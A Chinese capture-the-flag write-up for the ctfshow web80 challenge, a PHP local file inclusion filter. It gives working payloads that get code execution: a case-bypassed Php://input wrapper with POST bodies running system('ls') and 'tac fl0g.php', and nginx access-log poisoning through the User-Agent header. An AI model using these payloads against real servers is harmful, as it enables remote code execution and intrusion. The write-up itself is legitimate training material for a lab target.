[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
小李子呢021111 小时前
前端八股6---v-model双向绑定
前端·javascript·算法
He少年12 小时前
【基础知识、Skill、Rules和MCP案例介绍】
java·前端·python
史迪仔011212 小时前
[QML] QML IMage图像处理
开发语言·前端·javascript·c++·qt
AwesomeCPA12 小时前
Miaoduo MCP 使用指南(VDI内网环境)
前端·ui·ai编程
前端大波12 小时前
前端面试通关包(2026版,完整版)
前端·面试·职场和发展
千枫s12 小时前
kali 免杀木马
网络安全
qq_2602412312 小时前
将盾CDN:网络安全态势感知的建设与实践
安全·web安全
qq_4335021812 小时前
Codex cli 飞书文档创建进阶实用命令 + Skill 创建&使用 小白完整教程
java·前端·飞书
IT_陈寒12 小时前
为什么我的Vite热更新老是重新加载整个页面?
前端·人工智能·后端
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南06AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南07UV安装并设置国内源08实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了09Netlify 的深度解析及使用指南10Oh My Codex 快速使用指南